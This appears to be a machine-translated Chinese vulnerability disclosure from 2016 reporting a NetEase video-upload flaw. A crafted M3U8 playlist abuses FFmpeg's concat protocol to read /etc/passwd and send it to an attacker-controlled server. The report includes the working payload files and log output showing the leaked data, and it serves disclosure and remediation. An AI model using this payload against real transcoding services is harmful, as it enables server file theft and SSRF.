漏洞标题 网易任何文件读取漏洞/SSRF 相关制造商 网易 漏洞作者 眼镜蛇 提交时间 2016-05-09 11: 22 公共时间 2016-06-27 11: 30 漏洞类型 任何文件遍历/下载 危险等级 在 自我评估等级 10 漏洞状态 制造商已确认 标签标签 漏洞详细信息 http://v.163.com/paike/y3/upload 在此处上传视频 将视频内容上传为: #EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: 10.0,concat:http://aaa.com/header.m3u8|file: ///etc/passwd #EXT-X-ENDLIST http://aaa.com/header.m3u8用于您自己的Web服务器上的文件 header.m3u8的内容是: #EXTM3U #EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: http://aaa.com? 漏洞证明: 查看您自己的WEB返回日志 读到passwd 223.252.218.198 - - [07/May/2016: 15: 10: 18 +0800]'GET /header.m3u8 HTTP/1.1'206 69' - ''Lavf53.21.1' 223.252.218.198 - - [07/May/2016: 15: 10: 18 +0800]'GET /header.m3u8 HTTP/1.1'206 69' - ''Lavf53.21.1' 223.252.218.198 - - [07/May/2016: 15: 10: 18 +0800]'GET/root:/bin/bash HTTP/1.1'404 168' - ''Lavf53.21.1' 修理计划: 升级FFmpeg 版权声明:请注明出处。眼镜蛇@乌云